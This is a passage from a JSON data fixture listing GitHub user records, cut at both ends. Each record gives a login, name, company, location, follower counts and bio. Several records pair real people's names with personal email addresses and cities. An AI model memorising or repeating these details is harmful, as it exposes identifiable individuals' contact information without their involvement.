"collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2014-12-31T12:30:16Z", + "updated_at": "2024-01-08T13:38:55Z", + "node_id": "MDQ6VXNlcjEwMzU3OTI5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1671, + "fields": { + "nest_created_at": "2024-09-12T00:22:20.885Z", + "nest_updated_at": "2024-09-18T00:14:50.905Z", + "name": "Keith Hendershot", + "login": "Grimoren", + "email": "grimoren@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6591701?v=4", + "company": "", + "location": "Oakland,CA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2014-02-05T04:46:46Z", + "updated_at": "2024-08-30T17:00:16Z", + "node_id": "MDQ6VXNlcjY1OTE3MDE=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1672, + "fields": { + "nest_created_at": "2024-09-12T00:22:44.256Z", + "nest_updated_at": "2024-09-22T19:27:23.476Z", + "name": "Philipp Dallig", + "login": "Reamer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/454320?v=4", + "company": "", + "location": "Berlin, Germany", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 33, + "public_gists_count": 6, + "public_repositories_count": 31, + "created_at": "2010-10-26T08:26:38Z", + "updated_at": "2024-09-19T06:09:25Z", + "node_id": "MDQ6VXNlcjQ1NDMyMA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1673, + "fields": { + "nest_created_at": "2024-09-12T00:22:45.906Z", + "nest_updated_at": "2024-09-12T00:22:45.906Z", + "name": "", + "login": "Gh0s7", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3979059?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2013-03-26T21:05:28Z", + "updated_at": "2021-02-16T09:35:41Z", + "node_id": "MDQ6VXNlcjM5NzkwNTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1674, + "fields": { + "nest_created_at": "2024-09-12T00:22:49.650Z", + "nest_updated_at": "2024-09-12T00:33:48.959Z", + "name": "", + "login": "RunFox", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20059500?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2016-06-21T05:22:42Z", + "updated_at": "2024-08-21T12:20:33Z", + "node_id": "MDQ6VXNlcjIwMDU5NTAw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1675, + "fields": { + "nest_created_at": "2024-09-12T00:22:51.355Z", + "nest_updated_at": "2024-09-12T00:22:51.355Z", + "name": "Michał Kochanowicz", + "login": "michalkochanowicz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13177326?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2015-07-04T13:50:14Z", + "updated_at": "2024-07-07T09:45:31Z", + "node_id": "MDQ6VXNlcjEzMTc3MzI2", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1676, + "fields": { + "nest_created_at": "2024-09-12T00:22:53.006Z", + "nest_updated_at": "2024-09-22T19:27:21.670Z", + "name": "btai", + "login": "sudhirpandey", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1481305?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 17, + "public_repositories_count": 39, + "created_at": "2012-02-28T08:50:30Z", + "updated_at": "2024-05-27T19:46:07Z", + "node_id": "MDQ6VXNlcjE0ODEzMDU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1677, + "fields": { + "nest_created_at": "2024-09-12T00:22:55.088Z", + "nest_updated_at": "2024-09-12T00:22:55.088Z", + "name": "", + "login": "jordannstrong", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1619315?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 25, + "created_at": "2012-04-06T17:41:58Z", + "updated_at": "2024-06-02T16:15:59Z", + "node_id": "MDQ6VXNlcjE2MTkzMTU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1678, + "fields": { + "nest_created_at": "2024-09-12T00:22:58.737Z", + "nest_updated_at": "2024-09-12T00:22:58.737Z", + "name": "", + "login": "erickramer51115", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/150371222?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-11-09T16:19:03Z", + "updated_at": "2023-11-09T16:19:03Z", + "node_id": "U_kgDOCPZ7lg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1679, + "fields": { + "nest_created_at": "2024-09-12T00:23:00.362Z", + "nest_updated_at": "2024-09-12T00:23:00.362Z", + "name": "", + "login": "platformbeheer-otv", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/136718055?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2023-06-15T13:24:30Z", + "updated_at": "2024-01-17T11:16:08Z", + "node_id": "U_kgDOCCYm5w", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1680, + "fields": { + "nest_created_at": "2024-09-12T00:23:02.115Z", + "nest_updated_at": "2024-09-12T00:23:02.115Z", + "name": "", + "login": "K44sper", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16414789?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 22, + "created_at": "2015-12-23T13:44:04Z", + "updated_at": "2024-05-28T15:42:47Z", + "node_id": "MDQ6VXNlcjE2NDE0Nzg5", + "bio": "AKA AKU", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1681, + "fields": { + "nest_created_at": "2024-09-12T00:23:03.788Z", + "nest_updated_at": "2024-09-12T00:23:03.788Z", + "name": "Christian 'Pelle' Pelster", + "login": "pellepelster", + "email": "pelle@pelle.io", + "avatar_url": "https://avatars.githubusercontent.com/u/624069?v=4", + "company": "", + "location": "Hamburg", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 24, + "public_gists_count": 8, + "public_repositories_count": 22, + "created_at": "2011-02-17T21:03:48Z", + "updated_at": "2024-09-02T12:54:48Z", + "node_id": "MDQ6VXNlcjYyNDA2OQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1682, + "fields": { + "nest_created_at": "2024-09-12T00:23:05.017Z", + "nest_updated_at": "2024-09-12T00:23:05.017Z", + "name": "Artur Kasperek", + "login": "arturkasperek", + "email": "arturmiks@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6894763?v=4", + "company": "JoVE.com", + "location": "Poland, Gliwice, Zawiercie", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 5, + "public_gists_count": 9, + "public_repositories_count": 45, + "created_at": "2014-03-08T23:04:49Z", + "updated_at": "2024-08-19T05:56:04Z", + "node_id": "MDQ6VXNlcjY4OTQ3NjM=", + "bio": "Programmer/DevOps/SRE", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1683, + "fields": { + "nest_created_at": "2024-09-12T00:23:06.253Z", + "nest_updated_at": "2024-09-12T00:23:06.253Z", + "name": "", + "login": "Katheeja-Yasmin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/109402337?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2022-07-16T04:03:46Z", + "updated_at": "2024-07-11T06:33:48Z", + "node_id": "U_kgDOBoVY4Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1684, + "fields": { + "nest_created_at": "2024-09-12T00:23:07.493Z", + "nest_updated_at": "2024-09-12T00:23:07.493Z", + "name": "Markus Wehrle", + "login": "markus2810", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2051899?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 8, + "created_at": "2012-07-27T12:08:46Z", + "updated_at": "2024-07-29T10:27:37Z", + "node_id": "MDQ6VXNlcjIwNTE4OTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1685, + "fields": { + "nest_created_at": "2024-09-12T00:23:08.926Z", + "nest_updated_at": "2024-09-12T00:23:08.926Z", + "name": "Ahmad Alfy", + "login": "ahmadalfy", + "email": "ahmadalfy@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/87611?v=4", + "company": "@RobustaStudio", + "location": "Egypt", + "collaborators_count": 0, + "following_count": 112, + "followers_count": 824, + "public_gists_count": 2, + "public_repositories_count": 50, + "created_at": "2009-05-22T16:07:43Z", + "updated_at": "2024-09-03T09:40:52Z", + "node_id": "MDQ6VXNlcjg3NjEx", + "bio": "CTO @RobustaStudio , Google Developer Expert in Web Technologies.", + "is_hireable": true, + "twitter_username": "ahmadalfy" + } +}, +{ + "model": "github.user", + "pk": 1686, + "fields": { + "nest_created_at": "2024-09-12T00:23:10.211Z", + "nest_updated_at": "2024-09-12T00:23:10.211Z", + "name": "Isa Guimiot", + "login": "isaguimiot", + "email": "isabelle.guimiot@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/31544133?v=4", + "company": "", + "location": "Montreal", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 0, + "created_at": "2017-09-01T14:56:51Z", + "updated_at": "2024-08-22T21:02:36Z", + "node_id": "MDQ6VXNlcjMxNTQ0MTMz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1687, + "fields": { + "nest_created_at": "2024-09-12T00:23:11.438Z", + "nest_updated_at": "2024-09-12T00:23:11.438Z", + "name": "", + "login": "lizziebeans", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5188530?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2013-08-08T08:24:03Z", + "updated_at": "2021-11-08T14:17:42Z", + "node_id": "MDQ6VXNlcjUxODg1MzA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1688, + "fields": { + "nest_created_at": "2024-09-12T00:23:42.310Z", + "nest_updated_at": "2024-09-22T19:27:30.032Z", + "name": "Entur AS", + "login": "entur", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23213604?v=4", + "company": "", + "location": "Oslo, Norway", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 89, + "public_gists_count": 0, + "public_repositories_count": 213, + "created_at": "2016-11-02T12:09:58Z", + "updated_at": "2024-05-02T11:55:11Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjIzMjEzNjA0", + "bio": "Together for easy, sustainable journeys. We supply digital services to the public transport in Norway.", + "is_hireable": false, + "twitter_username": "Entur_AS" + } +}, +{ + "model": "github.user", + "pk": 1689, + "fields": { + "nest_created_at": "2024-09-12T00:23:45.894Z", + "nest_updated_at": "2024-09-22T19:28:11.826Z", + "name": "Thomas Skjølberg", + "login": "skjolber", + "email": "thomas.skjolberg@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1031478?v=4", + "company": "", + "location": "Norge", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 99, + "public_gists_count": 3, + "public_repositories_count": 136, + "created_at": "2011-09-06T23:14:40Z", + "updated_at": "2024-09-16T11:25:10Z", + "node_id": "MDQ6VXNlcjEwMzE0Nzg=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1690, + "fields": { + "nest_created_at": "2024-09-12T00:23:47.540Z", + "nest_updated_at": "2024-09-22T19:27:35.691Z", + "name": "Jenkins", + "login": "jenkinsci", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/107424?v=4", + "company": "", + "location": "United States of America", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2441, + "public_gists_count": 0, + "public_repositories_count": 2635, + "created_at": "2009-07-21T21:03:50Z", + "updated_at": "2024-08-25T11:21:56Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjEwNzQyNA==", + "bio": "Jenkins is an open source automation server with an unparalleled plugin ecosystem to support practically every tool as part of your delivery pipelines", + "is_hireable": false, + "twitter_username": "jenkinsci" + } +}, +{ + "model": "github.user", + "pk": 1691, + "fields": { + "nest_created_at": "2024-09-12T00:23:51.071Z", + "nest_updated_at": "2024-09-22T19:28:38.976Z", + "name": "Nikolas Falco", + "login": "nfalco79", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4160180?v=4", + "company": "Finantix", + "location": "Venice", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 12, + "public_gists_count": 1, + "public_repositories_count": 33, + "created_at": "2013-04-15T11:43:06Z", + "updated_at": "2024-09-20T11:29:16Z", + "node_id": "MDQ6VXNlcjQxNjAxODA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1692, + "fields": { + "nest_created_at": "2024-09-12T00:24:03.289Z", + "nest_updated_at": "2024-09-22T20:27:44.375Z", + "name": "August Detlefsen", + "login": "augustd", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1258191?v=4", + "company": "CodeMagi, Inc.", + "location": "Oakland, CA", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 61, + "public_gists_count": 0, + "public_repositories_count": 45, + "created_at": "2011-12-12T18:07:31Z", + "updated_at": "2024-05-05T00:44:27Z", + "node_id": "MDQ6VXNlcjEyNTgxOTE=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1693, + "fields": { + "nest_created_at": "2024-09-12T00:24:05.704Z", + "nest_updated_at": "2024-09-22T19:27:55.461Z", + "name": "Dale Visser", + "login": "dwvisser", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/490575?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 21, + "followers_count": 21, + "public_gists_count": 2, + "public_repositories_count": 63, + "created_at": "2010-11-21T12:26:57Z", + "updated_at": "2024-09-13T17:44:40Z", + "node_id": "MDQ6VXNlcjQ5MDU3NQ==", + "bio": "I have been a physicist and software engineer. Currently my job title is \"Researcher\", but that still means writing code...", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1694, + "fields": { + "nest_created_at": "2024-09-12T00:24:08.132Z", + "nest_updated_at": "2024-09-12T00:24:34.154Z", + "name": "Vít Šesták", + "login": "v6ak", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/184015?v=4", + "company": "Freelancer", + "location": "Czech Republic", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 25, + "public_gists_count": 140, + "public_repositories_count": 54, + "created_at": "2010-01-17T13:14:21Z", + "updated_at": "2024-02-09T13:13:16Z", + "node_id": "MDQ6VXNlcjE4NDAxNQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "v6ak" + } +}, +{ + "model": "github.user", + "pk": 1695, + "fields": { + "nest_created_at": "2024-09-12T00:24:09.425Z", + "nest_updated_at": "2024-09-22T18:32:42.039Z", + "name": "Justin Collins", + "login": "presidentbeef", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/75613?v=4", + "company": "", + "location": "\"The Bay\"", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 337, + "public_gists_count": 22, + "public_repositories_count": 83, + "created_at": "2009-04-20T06:03:50Z", + "updated_at": "2024-09-19T16:01:35Z", + "node_id": "MDQ6VXNlcjc1NjEz", + "bio": "I work on Brakeman and do web security stuff.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1696, + "fields": { + "nest_created_at": "2024-09-12T00:24:14.764Z", + "nest_updated_at": "2024-09-22T19:45:16.573Z", + "name": "John Melton", + "login": "jtmelton", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1624464?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 48, + "public_gists_count": 3, + "public_repositories_count": 15, + "created_at": "2012-04-09T02:52:32Z", + "updated_at": "2024-04-26T14:42:01Z", + "node_id": "MDQ6VXNlcjE2MjQ0NjQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1697, + "fields": { + "nest_created_at": "2024-09-12T00:24:16.035Z", + "nest_updated_at": "2024-09-12T02:39:01.628Z", + "name": "", + "login": "ThrawnCA", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3080440?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 20, + "public_gists_count": 0, + "public_repositories_count": 32, + "created_at": "2012-12-19T11:47:29Z", + "updated_at": "2024-08-07T22:44:17Z", + "node_id": "MDQ6VXNlcjMwODA0NDA=", + "bio": "Java and Python developer with an interest in web security.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1698, + "fields": { + "nest_created_at": "2024-09-12T00:24:17.276Z", + "nest_updated_at": "2024-09-12T00:24:17.276Z", + "name": "Piyush", + "login": "piyushml20", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25953476?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-02-22T11:17:55Z", + "updated_at": "2023-10-11T11:24:27Z", + "node_id": "MDQ6VXNlcjI1OTUzNDc2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1699, + "fields": { + "nest_created_at": "2024-09-12T00:24:20.129Z", + "nest_updated_at": "2024-09-22T19:27:57.716Z", + "name": "Stefan Neuhaus", + "login": "stefanneuhaus", + "email": "stefan@stefanneuhaus.org", + "avatar_url": "https://avatars.githubusercontent.com/u/8896988?v=4", + "company": "", + "location": "Cologne, Germany", + "collaborators_count": 0, + "following_count": 22, + "followers_count": 25, + "public_gists_count": 0, + "public_repositories_count": 35, + "created_at": "2014-09-24T09:51:55Z", + "updated_at": "2024-09-11T11:59:04Z", + "node_id": "MDQ6VXNlcjg4OTY5ODg=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1700, + "fields": { + "nest_created_at": "2024-09-12T00:24:21.350Z", + "nest_updated_at": "2024-09-12T00:24:21.350Z", + "name": "Eric Kelm", + "login": "asoftwareguy", + "email": "ekelm@planview.com", + "avatar_url": "https://avatars.githubusercontent.com/u/866865?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 7, + "public_gists_count": 6, + "public_repositories_count": 13, + "created_at": "2011-06-22T13:17:11Z", + "updated_at": "2022-11-09T21:30:51Z", + "node_id": "MDQ6VXNlcjg2Njg2NQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1701, + "fields": { + "nest_created_at": "2024-09-12T00:24:22.633Z", + "nest_updated_at": "2024-09-12T00:24:22.633Z", + "name": "", + "login": "kouryu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/650002?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2011-03-04T00:04:06Z", + "updated_at": "2021-11-30T03:55:28Z", + "node_id": "MDQ6VXNlcjY1MDAwMg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1702, + "fields": { + "nest_created_at": "2024-09-12T00:24:23.840Z", + "nest_updated_at": "2024-09-12T00:24:23.840Z", + "name": "Jiri Popelka", + "login": "jpopelka", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/288686?v=4", + "company": "Red Hat, inc.", + "location": "Brno", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 44, + "public_gists_count": 1, + "public_repositories_count": 194, + "created_at": "2010-05-27T13:50:36Z", + "updated_at": "2024-09-03T14:31:25Z", + "node_id": "MDQ6VXNlcjI4ODY4Ng==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1703, + "fields": { + "nest_created_at": "2024-09-12T00:24:27.121Z", + "nest_updated_at": "2024-09-12T00:24:27.121Z", + "name": "Dennis Post", + "login": "dennispost", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1068264?v=4", + "company": "Software Developer @dbsystel ", + "location": "Frankfurt am Main, Germany", + "collaborators_count": 0, + "following_count": 27, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2011-09-21T15:10:42Z", + "updated_at": "2024-05-09T11:15:52Z", + "node_id": "MDQ6VXNlcjEwNjgyNjQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1704, + "fields": { + "nest_created_at": "2024-09-12T00:24:30.461Z", + "nest_updated_at": "2024-09-12T00:24:30.461Z", + "name": "", + "login": "najibk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6780148?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2014-02-25T08:16:49Z", + "updated_at": "2024-07-20T17:25:59Z", + "node_id": "MDQ6VXNlcjY3ODAxNDg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1705, + "fields": { + "nest_created_at": "2024-09-12T00:24:31.705Z", + "nest_updated_at": "2024-09-22T19:24:45.487Z", + "name": "Jeremy Landis", + "login": "hazendaz", + "email": "jeremylandis@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/975267?v=4", + "company": "", + "location": "USA", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 172, + "public_gists_count": 1, + "public_repositories_count": 200, + "created_at": "2011-08-12T03:29:19Z", + "updated_at": "2024-09-13T11:37:07Z", + "node_id": "MDQ6VXNlcjk3NTI2Nw==", + "bio": "Java EE developer since 2009 and DevOps since 2017", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1706, + "fields": { + "nest_created_at": "2024-09-12T00:24:35.408Z", + "nest_updated_at": "2024-09-12T00:24:35.408Z", + "name": "", + "login": "tkep", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37106431?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-03-06T10:43:21Z", + "updated_at": "2018-03-06T10:43:21Z", + "node_id": "MDQ6VXNlcjM3MTA2NDMx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1707, + "fields": { + "nest_created_at": "2024-09-12T00:24:37.030Z", + "nest_updated_at": "2024-09-22T19:29:01.541Z", + "name": "Ernst de Haan", + "login": "znerd", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/117866?v=4", + "company": "Mindcurv", + "location": "The Netherlands", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 27, + "public_gists_count": 10, + "public_repositories_count": 49, + "created_at": "2009-08-21T11:18:13Z", + "updated_at": "2024-07-26T11:22:33Z", + "node_id": "MDQ6VXNlcjExNzg2Ng==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1708, + "fields": { + "nest_created_at": "2024-09-12T00:24:43.276Z", + "nest_updated_at": "2024-09-22T19:29:12.542Z", + "name": "Jonny Griffin", + "login": "jonny-wg2", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39831372?v=4", + "company": "Cisco", + "location": "Oslo, Norway", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 23, + "created_at": "2018-06-01T12:52:31Z", + "updated_at": "2024-09-04T08:27:16Z", + "node_id": "MDQ6VXNlcjM5ODMxMzcy", + "bio": "Security Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1709, + "fields": { + "nest_created_at": "2024-09-12T00:24:45.658Z", + "nest_updated_at": "2024-09-12T00:24:45.658Z", + "name": "Christopher Schultz", + "login": "ChristopherSchultz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12199769?v=4", + "company": "CHADIS, Inc.", + "location": "Arlington, VA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 33, + "public_gists_count": 0, + "public_repositories_count": 28, + "created_at": "2015-05-01T14:24:06Z", + "updated_at": "2024-07-18T17:30:13Z", + "node_id": "MDQ6VXNlcjEyMTk5NzY5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1710, + "fields": { + "nest_created_at": "2024-09-12T00:24:46.911Z", + "nest_updated_at": "2024-09-12T00:24:46.911Z", + "name": "German Suarez Alonso", + "login": "Yermanaco", + "email": "german.suarezalonso@telefonica.com", + "avatar_url": "https://avatars.githubusercontent.com/u/42812080?v=4", + "company": "Telefonica", + "location": "Madrid", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-08-29T15:48:55Z", + "updated_at": "2024-09-06T10:22:53Z", + "node_id": "MDQ6VXNlcjQyODEyMDgw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1711, + "fields": { + "nest_created_at": "2024-09-12T00:24:48.150Z", + "nest_updated_at": "2024-09-12T00:24:48.150Z", + "name": "Simona Avornicesei", + "login": "savornicesei", + "email": "simona@avornicesei.com", + "avatar_url": "https://avatars.githubusercontent.com/u/917232?v=4", + "company": "", + "location": "Cluj-Napoca, România", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 5, + "public_gists_count": 3, + "public_repositories_count": 10, + "created_at": "2011-07-15T09:06:56Z", + "updated_at": "2024-08-25T11:22:36Z", + "node_id": "MDQ6VXNlcjkxNzIzMg==", + "bio": "", + "is_hireable": false, + "twitter_username": "savornicesei" + } +}, +{ + "model": "github.user", + "pk": 1712, + "fields": { + "nest_created_at": "2024-09-12T00:24:49.364Z", + "nest_updated_at": "2024-09-12T00:24:49.364Z", + "name": "Jason", + "login": "cognitiaclaeves", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8933161?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 18, + "public_repositories_count": 75, + "created_at": "2014-09-26T20:54:26Z", + "updated_at": "2024-08-17T11:24:18Z", + "node_id": "MDQ6VXNlcjg5MzMxNjE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1713, + "fields": { + "nest_created_at": "2024-09-12T00:24:50.620Z", + "nest_updated_at": "2024-09-12T00:24:50.620Z", + "name": "Christof Dallermassl", + "login": "cdaller", + "email": "christof@dallermassl.at", + "avatar_url": "https://avatars.githubusercontent.com/u/1531978?v=4", + "company": "43bits", + "location": "Graz, Austria", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 28, + "created_at": "2012-03-13T08:17:25Z", + "updated_at": "2024-09-02T19:44:58Z", + "node_id": "MDQ6VXNlcjE1MzE5Nzg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1714, + "fields": { + "nest_created_at": "2024-09-12T00:24:51.881Z", + "nest_updated_at": "2024-09-12T00:25:07.557Z", + "name": "", + "login": "DanielOstovary", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45196419?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-11-20T08:59:23Z", + "updated_at": "2021-08-11T11:34:47Z", + "node_id": "MDQ6VXNlcjQ1MTk2NDE5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1715, + "fields": { + "nest_created_at": "2024-09-12T00:24:56.037Z", + "nest_updated_at": "2024-09-12T00:24:56.037Z", + "name": "Sven Filatov", + "login": "svenfila", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/303024?v=4", + "company": "Wise", + "location": "Tartu, Estonia", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 